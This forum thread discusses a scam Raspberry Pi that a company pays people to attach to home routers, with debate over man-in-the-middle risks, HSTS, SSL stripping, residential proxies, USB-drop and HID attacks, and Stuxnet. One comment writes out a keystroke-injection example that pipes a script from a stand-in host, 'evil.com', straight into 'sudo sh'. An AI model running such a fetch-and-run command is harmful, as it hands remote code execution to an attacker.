One comment in that thread[1] gives a full explanation of what such a Raspberry Pi device hooked up to the router can do: forward all the network traffic, replace router's stock firmware with its own, install software on the network connected devices via known vulnerabilities, spoof websites by acting as custom DNS server. In my opinion, it looks like "a Pi-hole[2], but for phishing".
I still don't understand how this device could steal login details. Everything should be encrypted and authenticated through PKI when using any website that accepts login details. Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.
>Everything should be encrypted and authenticated through PKI when using any website that accepts login details.
Yes, everything SHOULD be like this. I should be able to trust my neighbors and leave my doors unlocked as well, and I should be able to have faith in my elected officials. And yet...
The other issue is that you can connect to a website that implements HTTPS correctly, and still be borked if that site doesn't implement HSTS properly - there are tools that implement HTTPS downgrading on Kali.
>I still don't understand how this device could steal login details...Whenever I visit a website with an expired certificate, for example, Chrome gives me a big red warning banner before allowing me to continue to the site.
The problem comes when your corrupted router messes with DNS and sends you to https://evil.chase.com, which has a pixel perfect mock up of a chase bank login screen, and a perfectly valid cert.
That's not a downgrade, but a lack of upgrade. A few comments back said https://evil but it would have to instead be http://evil assuming no rogue root cert is installed.
And requires that if the user had visited chase.com, that chase.com not have includeSubdomains in their HSTS header.
So to prevent a downgrade attack before a first connection is made, not only does the domain need to "includeSubdomains" - and have a valid lifetime (maybe of at least 31536000 seconds, or 1 year [this may just be a government standard]), but they'd also have to send the preload directive in their HSTS header and have been preloaded by that browser platform. If the domain is not preloaded, that first connection is required to get the HSTS information to the client in the Strict-Transport-Security header.
Perfectly valid cert for the evil.com domain - someone below pointed out that I flipped the domain names.
In reality the "evil" page would look something like "https://www.login.chase/login?id=DEADBEEF/.evil.com". For a non-trivial number of users, that's enough - "I see the nice green lock, I see chase, and some crazy web address characters that are always there".
Unless you're doing something super clever with characters that I'm not understand, that's not how urls work. ".evil.com" is clearly part of the query parameter.
Assuming they're not doing anything weird with Unicode, the evil pi is probably running its own DNS server, intercepting the traffic intended for normal DNS, and basically creating its own TLD the same way you would normally do localdomain. The evil.com part is redundant.
For example you can go to my http://website.com now the normal website has a HTTPS redirect on home page. Your router replaces that page and disables the redirect. Now is up to you to notice you're on a http connection.
If you think is rare, I can tell you some fortune 500 FX and stocks trading have this vulnerability a year ago (didn't checked again).
Correct. HSTS does not protect against a first visit to a site. And to work around HSTS, there are many ways to get users to clear their caches, install new browsers, or use new devices to browse sites they've already visited.
Technically, if the domain had DNSSEC enabled, it might prevent this kind of attack, but no regular consumer is using a validating stub resolver, so even DNSSEC wouldn't work.
Now that browsers are saying "Not Secure" by default for HTTP pages, users are apparently expected to notice this popping up where it didn't before and realizing they're on a phishing site.
Anyone can preload their domain in Chrome, Firefox and others that share the preload list. I'm not sure what vulnerabilities are left after your site has been preloaded.
No. If the domain (and its subdomains) are preloaded - then a first visit is not required. The HSTS requirement is then baked into a list supported by modern browsers such as Firefox and Chrome.
HSTS and Certificate Transparency, yes. Certificate Pinning is too easy to shoot yourself in the foot with, so it should only be considered for the most sensitive sites.
Dynamic pinning (HPKP header) is being rolled back from browsers because of the reasons you mention. Only a small set of static pins will remain (in Chrome, Google sites for example).
Are Windows 0-days really that common? I thought they were usually saved for really serious attacks, e.g. from state-sponsored actors, not scams on the level of "pay some random person $15 a month to attach a mysterious device to their router".
Not only that, but because the device has unfettered access to the internet, an attacker can always update it with new ways of installing certificates on your machine.
any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.
If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.
DNS can be mutated.
Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.
...
Hundreds (if not thousands) of repeatable attack vectors given physical access to the network like this.
> any site that is loaded via http can have content mutated -- forcing users to http (and then acting as MITM), injecting javascript, other payloads.
Which is why everyone is moving to HTTPS.
> If you can get a foothold on client computers you can also do things like inject trusted CA's to allow yourself to act as MITM without any cert issues raised.
If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.
> DNS can be mutated.
Which won't allow you to MITM HTTPS sites.
> Auto update software that does not check the cert chain and hash of the deliverable can be used to inject and run code.
Any auto update software which doesn't verify certificates has a major security vulnerability.
>HTTPS protects against all of these:
>Which is why everyone is moving to HTTPS.
Yes, but a MiTM can block or hamper conversion to https and mutate the content. HPKP and HSTS are not widely used yet (and even if they are the first request can be bypassed given this topology). Given current "end user" level protections having a device such as this on your network basically ensures you can be hijacked if even one request made is over https or not currently pinned to HTTPS.
>If you get access to the client computer all bets are off. You can just force all their traffic through a MITM proxy, no router hacking needed.
FFS, the point is the MITM gives a huge amount of attack surface to breach the client -- which yes, after that is done you lose all bets. Everything from injecting code intip zips/exec/etc downloaded over http to using 0day browser exploits and mutating requests. The device itself is physical access to your network which makes access to the clients 1000x 9if not more) easier.
> DNS can be mutated.
There are other protocols besides HTTPS.
>Any auto update software which doesn't verify certificates has a major security vulnerability.
Given, Yes. That does not make it rare or unusual. look at the CVS. There are many developers that write (or enable) auto updaters that should not be responsible for that given their understanding of security.
It's amazing how many people forget that Raspbian is still Linux under all the Wolfram and Raspberry Pi stuff. So you essentially have a tiny computer that can be plugged into almost anything you can program for.
It depends on what you're using it for. I bought a kit for setting up a retro-pi because I didn't feel like checking to ensure the parts were all compatible. It gives you step by step instructions to set it up, and none of it requires knowing anything about Linux. You just download an image file, write it to the ssd, and when you plug it in it does all the setup itself and you're just presented with the retro-pi GUI. The only hint that it's Linux under the hood is when the names of processes scroll past on the screen as it's booting.
If they picked it out and bought it, yes, obviously.
However, there are a lot of products sold that perform selected tasks that run on preconfigured raspis with the consumer none the wiser. Kodi boxes, emulation kits, scientific plug-and-go kits, and much more.
I have been offered or asked about things running on raspi hardware on many occasions by people who were none the wiser to what platform they were using, and we recently had an event where we gave out around a hundred of them preloaded with run-once synchronized software for an event. How many of those people knew for certain they were holding Raspberry Pi Zero W boards with pared down Linux kernels? None.
They're a lot more commercial and common than a handful of snarks with downvotes realize, and OP doesn't deserve to be punished for that.
Keep in mind that all modern routers are also tiny computers running a Unix variant like busybox. They can run arbitrary programs and they’re connected to everything you have by default.
Is a disk image of one of these available anywhere?
I find it much more likely that these are being used for what they say they are (basically a proxy so they can buy ads from a residential IP) than some crazy MITM device. The "Attacker" is basically renting an IP connection or paying a co-location fee for their little server.
Plugging a device into your network doesn't make it magically see all the traffic. It would have to be doing ARP spoofing, DHCP hijacking, or hacking the router config/firmware. Is it possible that it is doing some or all of those things -- sure. But why? That could all be done via a malicious client executable that would give you access to the network and much more and is much more discrete than a physical box, so why would someone go through the trouble of shipping out a box + paying the recipient? The more simple explanation is the sender of the device is doing nefarious actions on the internet and needs a bunch of IPs for cheap so when they get blocked they can just move on to the next IP.
Would I put one of these on my home network - hell no. But if one of my friends tells me they had one plugged into their network I wouldn't immediately assume that their entire digital life was compromised. I would tell them to unplug it though.
Well if they are willing to break TOS to sell ads on facebook how much further do you need to go to rationalize auth capture, rootkit injection or any other malicious activity.
"Plugging in the device on your network doesn't make it magically see all of the traffic" ... Assuming it has not been constructed to do all of the things you list (or more) does not magically make it not see all of your traffic either. There is no magic involved, it is either constructed to capture/inject or not -- the only way to know is to review the actual bits and firmware.
Unless you work in a SCIF (and probably not even then) your local network should not be considered trustworthy. Assume that hostile activity is always present. Especially if you have "appliance" type stuff on your LAN, such as ISP-provided routers, Amazon/Google devices, smart light bulbs, etc. Keep your machines and firewalls updated.
Unless OP is someone very special, all their private data isn't worth 15 dollars a month.
I suspect this device is far more likely a broadband speed testing agency trying to get speed test results from different consumer ISP's, taking WiFi and the customers device out of the picture.
I disagree; the plug-in-this-Raspberry-Pi scam is unfortunately not uncommon, and not at all related to broadband testing AFAIK. A company called rentyouraccount.com runs a similar scam, and their service explains what the Pi is doing:
>Facebook has several mechanisms in place to protect your account. We make every attempt to work within the these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.
Yes. You’re right. These things don’t care about local traffic. SSL would ruin its day if that where the case.
This is meant to be an agent to a network of these things. Not sure what the total point really is, but I can pretty much guarantee it has absolutely no cares about the local traffic.
For wired Ethernet it depends on whether the traffic even reaches that port or not. Old dumb Ethernet hubs used to pass all traffic to all ports, but modern switches only send traffic to the intended destination.
It will show you everything coming out of the switch port but only traffic to/from the connected device will come out the switch port.
You have to use ARP poisoning or some other trick to get other network devices to send ethernet frames to your mac address in order for the switch to forward them out your port.
If someone would ship this to our office with a note like "attach this to a LAN port" chances are it will get attached. And we're a software house. People tend to pay attention to viruses, etc.. but not physical security.
At a previous employer (Fortune 500, not a software co.) the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network. IIRC there was a depressingly high (> 50%) rate of them being plugged in.
> the IT security team would sometimes seed the parking lots with thumb drives that were "infected" with a program that would phone home to them if plugged into a PC on the corporate network.
Which is clever, but given the current level of small scale integration you could just as easily hide the same exploits inside of a charging cable, a USB fan, or really any other small-form factor USB-pluggable gadget. The problem isn't them discriminating between "hacked" and "non-hacked" devices -- it's them plugging _anything_ non work related or issued into their USB ports.
Anecdotally, I heard of a toy radio control quadcopter belonging to western military personnel in Afghanistan that turned out to be trying to phone home to ${badguy} when they plugged it into a laptop to charge. This stuff is everywhere, and has been for years.
Product idea: internal condoms for every USB port on a business computer. Let employees charge their phones in USB ports or plug whatever in, data wires never connect - problem solved: Employees can charge their ${device} without risking security compromise of the host workstation.
How is that better than epoxy squirted into all unused ports of your existing computers while also distributing fast charging USB wall warts across the office like confetti? Even the good ones are relatively cheap, especially if bought in bulk. Relative to the cost of a desktop computer they're practically free.
(I'm genuinely surprised that the standard DELL and HP corporate workstation doesn't have its front USB ports deleted and its rear port access covered by a lockable metal cowl.)
I noticed that with my mobile wifi (Huawei) which I generally leave plugged in, when my friend plugged in her Windows 10 tablet to the same power outlet (2 sockets), it suddenly noticed it as a new USB device. I don't ever plug anything in there except a charger for my bike light so had never noticed but I don't know if it has an autorun to install drivers they often do. Obviously the data wires are joined there..
At least on Dell, USB ports can be disabled in the BIOS (with separate options for front and rear ports). Disclaimer: I haven't tried to do it so I don't know if it actually works.
Caveat: you'll need to hire a lot more IT people because everyone in the company will be lined up out the door with complaints. "This computer doesn't work with my keyboard, I need a new one." "My mouse isn't working." "This computer won't read my flash drive and I have to get this file to accounting by 10:00!" "This computer isn't working with my pen tablet and the deadline for getting these graphics done is tomorrow!"
So you'll have to replace all of your intentionally-broken computers with good ones, which will cost a fortune on top of all the employees' lost work time and no one will want to buy the broken computers from you so you'll have to pay to have them scrapped.
You still need to hook up stuff to a computer - mice, keyboards, those weird 3D-mice our CAD people use, printers, and these days even displays are all attached to USB ports. And since the ports USB replaces have mostly gone, there is little alternative left.
At work, we keep a couple of power-socket-to-USB chargers around, if people want to charge their smartphone they can grab one. But simply disabling the USB ports on our users machines is not a realistic option at this point.
No, shorting the data pins signals "this is a charger, you can charge as fast as you want, until it's so much current that the voltage starts to drop too much".
So these IT genuises at a Fortune 500 company were clever enough to test their employees' computer security acumen (and get the predicted result) but they weren't clever enough to simply block all use of USB mass storage devices on their corporate operating system distribution?
Surely by now all corporate desktops should be configured to not respond to any USB devices other than the generic HID for mouse and keyboard, plus a whitelist of approved devices (e.g. fingerprint readers, Yubikeys). Inserting a USB mass storage device into a corporate workstation should result in nothing. Plug-and-play shouldn't be triggered. The mass storage driver should not load.
The computer security industry for SMBs is like 95% theater and 5% actual practice.
Conducting that test produced something tangible for whoever made the purchasing decision: It clearly illustrated a need for the services rendered, did it in a way that offered job security to management by giving them license to assert the position over their subordinates, and established a metric by which to evaluate the security company's performance which can be easily, repeatably, and predictably improved over time.
It also checked a lot of boxes that will be useful in court if they ever need to prove that they weren't negligent on privacy and security, which is a form of insurance that has real measurable value when it comes to legal claims.
> The computer security industry for SMBs is like 95% theater and 5% actual practice.
I'd say it's 40% paranoid arse-covering by IT department heads, 35% whatever middle management incorrectly assumes to be current best practices, 20% ego-stroking by the CIO, and 5% sensible context-driven decision-making by IT front-line staff.
Those numbers sound a little thin on the bottom, but only a little. Maybe take 15% out of the CIO category and just throw it away, because they're usually very quick to turn on their underlings.
Trouble is that the same corporation has the following additional policies:
* A ban on mail attachments of certain types (excel, zip files...)
* mailbox limits from the 1990’s (100MB or so)
* a ban on Dropbox, Gdrive or any other file sharing service
* No public facing sftp or similar
* A web site so mired in red tape that it takes 6 months and a dozen approvals to get anything uploaded.
Often the USB drive or something similar is the only way for employees to actually do their jobs.
It seems the problem is bad corporate file sharing policies that are incorrectly validated as successful because the employees are using workarounds rather than pointing out its inadequacies.
One of many depressingly common pathologies in large organizations. The best way to ensure your infrastructure won't break is to ensure it's not used; whether or not that means people can do their job is a concern for a different department.
I have seen this kind of situation, too. It sucks, but if you play by the corporate rulebook and lobby for better rules, you will be either worn out or retired by the time those rules get updated.
In these situations the organization really should get box.com subscription (or Dropbox enterprise) and have file sharing with control, auditing and org policies.
Don't believe generic hid is safe either. You could make a device that pretends it's a keyboard and automatically inputs win+r curl http://evil.com/script.sh | sudo sh sleep alt+y.
Sorry for mixing windows and Linux but conceptually something like this should work on windows if you don't require password in your UAC prompts.
I wonder if a big (Fortune 500) company could get HID devices which were customised so that only company owned devices could be plugged in.. it shouldn't be that hard to design such a device that would show up as a custom device then the installed driver would poke it in a crypto shielded way and it then provides the keyboard/mouse inputs. It can't simply do the standard 'detach and reattach as a HID' because otherwise then a HID would work..
Hm, perhaps.. is anything like that available already?
I don't think I've ever heard of a company that actually does this in practice. I suspect it ends up simply being more trouble than it's actually worth. I know at that company the list of approved device would probably end up being dozens of pages long... and yeah, thumb drives and USB hard drives were used a decent amount, especially outside of IT.
Maybe someone needs to invent a USB-based thumb drive reader that only allows generic mass storage devices to be attached but does not work as a hub, rather as a proxy device.
Bonus points: don't mount the drive directly, instead connect it to a centralised server on the corporate network that scans for threats and mounts a sanitised version of the drive's contents as a network share.
Triple word score: audit everything contained on every drive and everything that is copied on and off.
Sell that for $200 per unit to Fortune 500 companies and paranoid government agencies worldwide... and you'll retire early.
Your triple word score is already handled by a dozen different companies doing endpoint security from advanced heuristics at the kernel level like Crowdstrike, or just filenames and hashes like Code42.
A consumer (i.e. workplace for people who don't know better) NAS is usually Linux with a few hard drives attached via a cheerful and brightly coloured web UI - occasionally useful, some way short of secure.
I expect someone sells hardened ultra-secure corporate NAS boxes, but I've never seen any in the wild.
The trouble is, the sort of people who would buy a pre-hardened NAS are also the sort of people who would be suspicious of a pre-built unit. I know for sure I wouldn't trust anything off the shelf, I'd take the base OS and build something around it.
Work at a fortune 500 company, we're currently eliminating USB ports for data devices - but leaving them open for other devices that do not identify as media.
We are dragging people to a corporate cloud solution, however we are finding that the drive to cloud has severely underestimated the volume of data that people will sync across the network, and how much work is done outside official corporate systems and in Excel instead.
This is having 2 effects our network capacity is being drained, and users are reporting performance issues due to latency associated with poorly developed excel applications.
It's a pentesting technique, used to assess the level of effectiveness of user training.
While your final comment is accurate, it is impractical as usb mass storage is still required in many places. Also, you can't effectively block HID, and an attacker can use HID disguised as or in a thumb drive to successfully attack a network.
I’m not sure I understand what the big deal is unless your machine tries to run software automatically from devices that are plugged into it. If you plug something into a centOS machine it’s not going to be able to do anything until you mount it and even then why would code be able to run from it?
Well for starters, if you’re curiously plugging it in, you’re going to mount it aren’t you?
Second, it can emulate an HID keyboard device and type keystrokes faster than you can react and pull it out, at which point it’s far too late - it’s pulled a secondary payload down or mounted a USB mass storage device and you’re owned.
You got me at the emulate a keyboard thing. Now I’m thinking that you shouldn’t plug strange keyboards or mice in because they could have an onboard payload. The crash cart at a data center is kind of a dumb idea in a way except the place is full of cameras usually
You know those little desk fans that come with a USB now and also an adapter to plug into the electrical outlet. I don't plug those into my laptops ever - who knows if there's a payload on them.
I will say this. I currently work, and have worked at, a few secret and top secret facilities - and the number of people I see plugging those (and similar) devices into their laptops is scary.
> the number of people I see plugging those (and similar) devices into their laptops is scary.
If such a device is able to cause a compromise / incident in a secure facility, well, several different "failures" at several different levels have occurred in order for it to get to that point.
Yeah, it irks me that this is seen a "stupid users" problem when our OSes are programmed to automatically execute code on a USB stick. I don't think the users are the stupid ones in this scenario.
> If you plug something into a centOS machine it’s not going to be able to do anything until you mount it ...
You may want to double check your CentOS desktop's defaults (you might be surprised).
My most critical machines have a file named /etc/modprobe.d/disabled.conf with entries such as these for dozens of filesystems, network protocols, and such:
When absolutely required, they can quickly be temporarily commented out (but not by mistake) and there's some very extensive auditing rules that keep an eye on things at that point.
It's really not that hard to lock a machine down and yet still have it actually remain usable. With the exceptions of the few security-focused distributions (Qubes OS, Tails, etc.), I can't think of any Linux distribution / desktop environment that even comes remotely close to doing anything like that (OOTB) by default, though.
A lot of IT security teams do this. On one side it is depressing, but on another side it is annoying to have to hear them talk about it every staff meeting. All companies seem to have people with zero understanding of computers and will fall for anything. I wonder how effective the education is. I guess if it prevents one attack it can pay for itself.
Only a little bit. Most IT CyberSecurity teams can use bad stats to justify their value and additional staff, so they want to bring it up at every opportunity.
I don't necessarily disagree, but power users often get frustrated by red tape applied to everyone and not just those who consistently misuse their computer privileges.
I was at a financial software firm that dealt with USB security issues by filling the USB sockets with epoxy. The keyboard and mouse could not be removed from their USB sockets as they were held in place with a metal collar bolted to the case.
Simple and effective, although it destroyed any resale value of the PCs.
In my company (Fortune 500), we get new notebooks every 3 years and IT persistently pesters owners of old notebooks to return them. Given the sheer number of devices, I can imagine a reselling contract to be a nice additional source of income.
In this company's case the PCs were the cheapest of the cheap. Bottom end Dell and HP stuff.
when they were life expired they were given over to a recycling company, whom I assume would take the time to pick the epoxy out of the USB sockets or probably just replace them. I think buying new USB sockets and connecting ribbons to the motherboards is probably quite cheap these days
In the US, above a certain size you're basically required to sell off the old hardware because throwing it away counts as polluting, and the people who dispose of exclusively tech stuff charge you for that service.
Yep, look on eBay for sellers that specialize in refurbishing them. It's a great way to get something like an older Thinkpad for really cheap. Perfect for a Linux laptop that doesn't need the latest and greatest.
Never underestimate the distribution of stupid. I worked at a hardware / software company where management distributed USB drives as a reward for something or other. The USB drives weren't even in blister packs they were just loose in plastic envelopes. I threw mine out, and wrote a complaint.
Especially when stupid is an observable attribute in the industry.
Time and time again the technology industry has failed to consider security as a serious issue, never mind develop systems that are robust and transparent.
We don't have botnets, booby-trapped mail attachments, script-hackable servers, USB drives that can carry a viral payload, and all the rest because users are stupid, but because the industry's default culture is to think of security as an esoteric side issue, and not a non-negotiable critical feature in all IT systems.
More specifically, they tend to view it as a cost center that does nothing to increase profits.
Thing #1 to remember if you're in infosec is that you must pitch it based on the money saved by not having expensive problems like having to hire outside consultants and auditors after a breach.
No, iirc stuxnet spread itself without anyone physically leaving a USB stick anywhere. On a system infected via the network, it would try to infect any USB drives connected to the system.
Stuxnet is fascinating. Still, as far as I can tell, the most complex, interesting malware ever found in the wild. I believe it's unclear how stuxnet found its way into the enrichment facilities.
It did contain a USB device exploit delivering a dropper with a completely separate payload specifically targeted at the Natanz facility. A compromised USB device picked up in the parking lot would do the trick, but there are certainly other ways to get something through the front door and that information is unlikely to be public knowledge any time soon.
I do remember reading about that. It exploited a bug in windows to load an executable when the usb was plugged in. It then installed a usermode rootkit and hid its files.
It probably got in via usb in the parking lot, but there hasn't been an official statement that I know of. It was confirmed that the hack into the DHS intranet was done by USB stick in the parking lot.
Natanz was air gapped. Stuxnet penetrated the facility on a phisical device, once inside it spread over the LAN. The Widespread distribution of it on the open Internet was because of a bug in the code.
> The Widespread distribution of it on the open Internet was because of a bug in the code.
It's presumed that the Israelis got a little bit greedy and, even though it was doing it's job, tried to make the virus do it's job a little better. They made it more virulent which made it spread outside of the systems it was only targeted to spread to.
My understanding is that stuxnet got out of Natanz, by mistake. The world was never supposed to see that code. It was planted inside the Natanz secure perimeter.
Well, certain versions of stuxnet were sent to Natanz suppliers first, and I believe the infection made it out into the world from one of these suppliers, not Natanz itself.
This is why, as much as I hate it most of the time, it's a good idea not to have your devs with access to your network setup. If your a small shop, limit the access as much as reasonably possible.
Emphasis on reasonable. If you limit workers' access too much for them to do their jobs they will find creative workarounds. Some of those can be more dangerous than just giving them the access that they need in a way that you control. Examples being if you make it so that the only way developers can debug a system is by adding in backdoors, or if you lock down the network so much that they need to use an unsecured public network to do their work. I've seen those things happen. Developers and IT need to work together, not be adversaries.
In the days when USB sticks were more common it was an easy tactic for someone to drop one in a company parking lot labeled “salary data” and with almost certainty that thing would get plugged into a device on the corporate network. The biggest security vulnerability in most cases is still users doing dumb things.
That's weird, given how USB devices are also often banned so people resort to using online services. I implore people to prefer Airdrop, as it's an encrypted peer-to-peer system. Slack is the easy option, but it's a US based corporation. If you'd pass customer data through Slack you'd already be in violation of local laws.
I don't see how this 'man' in the middle could actually intercept passwords, except for http, but who runs auth over http anyway. For https, the 'man' would have to substitute its own certificate and then the browser / client software wouldn't trust the cert/domain combination without the end user being extremely stupid (and knowledgeable enough to achieve the stupidity).
It could use something like bdfproxy[1] to intercept HTTP-downloaded EXE files, then add some persistent malware in _addition_ to whatever the EXE was doing. This has been done before, over Tor[2].
The malware doesn't have to add a new root certificate, either, though that's completely possible. The Zeus trojan [3] does "man-in-the-browser" to intercept banking information, for example.
so the spoofer distributing these devices is going to all this trouble/expense/risk in the hope there is a http downloaded exe it can corrupt, then hopes the hashing doesn't fail on that corrupt exe, and hopes the user ignores the untrusted source warning so that it can install a trojan?
I think what he means is that it seems like a lot of trouble to hack someone who is not necessarily hackworthy? Like what kind of things would you expect to gain from someone who would be as computer illiterate as to allow all that to come to fruition?
I work on a software company. You would be amazed to know how many manager types, earning 6 figures, who are absolutely naive with regards to security. Those are prime targets for this kind of exploit.
These are the same users who connected an untrusted block of hardware directly to their router and presumably gave them a their Facebook login and password.
SSL stripping perhaps? There are still plenty of sites that don't implement HSTS, and not all users are vigilant enough to notice when the site they're visiting suddenly doesn't have HTTPS anymore.
Web security has been improving a lot in recent years, but it's not yet at the point where a man in the middle isn't a relevant threat.
You type in http://yourbank.com, your bank respomds with a 301 to https, but this helpful router instead takes you to its phishing site. Lots of people wouldn't notice.
CA's are fully automated, they won't review or check for phishing lookalikes. Maybe reactively if it's being reported, but, should they operate as the internet police? What if it's a legitimate bank that has the same name (with an accent) and isn't beholden to the same trademark in their country?
+ It may seem like it is if your organisation gets a bunch of EV certs with the same organisation info under some bulk deal. The issuer only does the expensive manual EV steps once per period, if you're Google in January then (the thinking goes) you are still Google in June. This saves them money so it enables them to offer pretty good deals for lots of EV certs.
+ Good EV providers streamline the manual stuff in countries like the US that have their government records online. A call centre employee can do the searches, pull up contact details and phone your Head Office or whoever to confirm in minutes not hours. However this also means they won't necessarily pick up on subtle clues like why is this outfit named Myba N K ? Oh! That's My Bank but with misleading capitalisation and spacing.
+ White hats toying with EV discovered that outfits like D&B relied on in the business community to verify identity are... Not very reliable. If D&B says the Head Office is at 632 Wall Street that might be because somebody filled out a web form, not because D&B agents even checked 632 Wall Street exists let alone that the company has offices there...
The spoofer can obtain a valid certificate for another, seemingly legitimate site. Any software that hasn't explicitly pinned the leaf TLS certificates will still accept the (valid) certificate it is redirected to.
And sadly, a lot of software still doesn't perform certificate pinning.
This will seem like a valid website, especially if the phishing site is done well. Not just non-technical users, I'd wager some tech familiar users would be fooled too.
The focus always being on the lock icon might not always cover it.
I think Chrome for a while has simply refused to let you visit a page when there's an SSL problem (at least for certain types of problems), which seems like a reasonable solution to the "people will just ignore warnings" problem.
Whilst it's certainly a scam to do with advertising [0], I doesn't look like there's any evidence that the scam has anything to do with 'stealing' anything from network / network traffic:
> Facebook has several mechanisms in place to protect your account. We make every attempt to work within the these constraints. In order to keep your account from being locked we use a small device called a Raspberry Pi. This device allows us to connect to Facebook advertising APIs from your home network and avoids the hassle of your account being locked due to unfamiliar activity. Learn more about the Raspberry Pi below.
I find these claims extremely dubious. Everything they claim the Pi is needed for can be accomplished without the equipment and postage costs with a purely software solution; The hardware allows them to monitor all traffic and avoid antivirus/firewalls. Moreover, I doubt it is difficult to find mass-market Facebook accounts for much less than $15/month - it is far more likely that, given the hardware allows them unfettered access to all network traffic, it is designed to report back as much data as possible, ideally including plaintext passwords and banking information.
In this case, having a distributed botnet of Pis at people's houses would make sure you didn't get IP blocked by Facebook, since there are also legitimate users at that IP. Facebook probably would not block it, and even if it did unplugging and plugging back in the modem is enough for most residential gateways to get a new external IP.
The hardware gives a better guarantee of botnet uptime though. If you want it to be powered on and attached to that network 24/7, you can't rely on their laptop/desktop.
>Why do you need my account? Why not use your own? We have plenty of our own accounts. We need you because no matter how many accounts we have internally, Facebook limits the amount we can spend per account. By working with people like you, we are able to scale our business.
Can somebody explain if this makes sense? Why are there limits on account spending?
Look lower down that thread for the FAQ from the company: they're using the roommate's Facebook account to purchase targeted ads on Facebook in order to evade Facebook's internal controls. https://www.reddit.com/r/Scams/comments/2vd1g8/scam_rentyour...
Sort of tongue in cheek, since I don't know the range of state of the art acoustic side-channel taps. I guess you'd also probably have power fluctuations and network timing channels to exploit.
Plus, a lot of different points at which to attempt to insert a second stage into the connected devices themselves, using all the tricks everyone else in this thread has mentioned.
If I had to guess, it's providing VPN endpoint/relay services to scammers (CC fraud, etc) who need actual residential IPs to buy things from. Or to use to set up accounts/sockpuppet accounts for things like automated reddit vote manipulation.
It's obviously located "inside" the residential end user's router/NAT, on their wifi, so it'll have something like an openvpn or ipsec daemon on it that initiates a connection to an endpoint elsewhere on the internet, building a tunnel for the botnet operators to control it remotely. Or via tor to a tor hidden service somewhere, like many purely software trojan botnets for win32/win64, but in this case it will have the vpn or tor binaries running on its own dedicated raspberry-pi class device.
If you have a botnet of several thousand devices which can be made to look indistinguishable from legitimate "ordinary non technical user sitting at home on their comcast connection with their laptop or tablet", you can do all sorts of things. Relay http/https traffic for a click farm in Bangladesh where people are upvoting reddit comments en masse to promote a product, sockpuppet facebook account comments for political campaigns and pushing political agendas (russian internet research agency, anyone?), etc. The goal here is to make the traffic look like legit single end user residential internet traffic and not traffic that's coming from netblocks of major colocation/dedicated server/VPS/VM hosting companies, whose ARIN/RIPE/APNIC space is all documented as such.
There's fraud detection systems which will trigger if you're trying to buy something like amazon gift cards from a /20 netblock of an ISP in Bulgaria, but are less "suspicious" if your traffic and useragent, etc, are all coming from a Frontier, Centurylink, Comcast etc netblock in a major American city. Stuff like the maxmind geolocation data correlating closely with the billing zipcode/shipping zip code of what you're trying to buy with a stolen credit card, or other identify theft type scams.
If you're doing some variation on a massive vote manipulation service, there's also fraud/botnet detection systems which will trigger on large volumes of upvotes (or similar manipulation) all coming from the same geographical location and netblocks. Your traffic look more like legitimate end users if it is geographically distributed across many states and provinces, many english-speaking countries (AU, NZ, CA, UK, etc), and across many ISPs and several different common end user browser useragents (edge, chrome, firefox, etc). Imagine if you threw 500 darts at a map of the USA on a wall and distributed all your botnet devices randomly around the map, vs having 300 devices all on the same network in the Chicago metro area, for instance.
There are companies out there that offer proxies from 'real' US resident IP addresses. I think these companies use tactics like this to be able to offer real residential IPs (and not IP ranges belonging to hosting companies)
This is the first one that came up on google - https://stormproxies.com/ - I'm not saying that specific company is in any way related to this device or tactic (it is just the first on google for 'residential address ip proxy', but I think it is companies similar to this that will pay people for access to their routers and sell that access.
What I find noteworthy about that stormproxies website is that unlike any sort of legit ISP, there's no information on what company is actually behind it, phone number, mailing address/street address, etc. I bet if you played follow the money with its credit card payments the money goes to a bank account in Cyprus or something.
It's a slick html template and some marketing text masquerading in front of a service obviously sold to greyhat/blackhat end users.
(perspective: I work for a legit ISP that has real things that physically exist in many POPs at layer 1 in the OSI model).
They've gone well beyond the extension now. These days you have no idea if that "free" app you've installed has made a deal with Luminati to sell your bandwidth to the highest bidder. They also have an Android SDK too. I've received several emails like the following:
> My name is Lior and I lead the SDK partnerships at Luminati. I assume your
> software earns money by charging users for a premium subscription or by showing
> ads - both models do not pay out much and harm the user experience.
>
> We now offer you a third option.
>
> Luminati’s monetization SDK for Windows desktop provides your users the option
> to use the software for free, and in exchange we pay you $30,000 USD per month,
A somewhat dated reminder that "Social engineering is the best engineering." when it comes to getting around security blocks. As Natasha said to Boris, "I said system is 'Idiot proof' not 'Moose proof'!"
For serious. the kind of idiot who would hand over facebook credentials, bank account info, and physical network access for fifteen bucks a month to a total rando is also the kind of idiot who will dig up their roommate's social security card to help them out when the nice person from the IRS calls about back taxes.
Still, network security is extremely hard when the actor has physical access to your networking hardware. I currently live in a dorm situation and put each roommate on their own separate vlan on their own separate wireless gateway behind an f5 firewall running snort and I'd still be at risk if one of my roommates decided to put something between my gateway and the router.
I dunno. Locking down some things may make sense. But, for the most part, assuming that physical security for your wired home network is sufficient doesn't seem like an unreasonable assumption combined with standard practices for your systems.
I like some cryptographical guarantees, so my trusted devices get to be on a overlay WireGuard based VPN, and the access from actual ethernet/LAN gets blocked. VPN still uses IP/port blocking, but thanks to WireGuard, you can be sure that source IP really matches the device you think it does.
Imagine a small loop-back-like device which is plugged into all open network ports - if any of them are removed from a network port, an alert is generated stating "device from port 48 on switch 1 in closet 0 was removed"
In general it's best practice to leave unused ports on managed switches in an admin down/shut state until something you know is connected. Or live, but in a quarantine VLAN.
Your idea, however, is not totally uncommon to have a raspbery pi sized device at an offsite location, specifically not plugged into any sort of UPS, which is monitored by various alerting systems. In addition to the alerts that one should get during a grid power failure event from managed UPS and automated generator transfer switch systems, the disappearance of your "UPS canary" can indicate that something is going on at an unattended site.
My college used to do similar. If you did not register your MAC address, you would be DHCP assigned into a walled-garden IP block.
We found we could run an IP scanner on the authorized subnet (from a computer with a whitelisted MAC), and find the unused IPs, and just set those statically for 'visitors'.
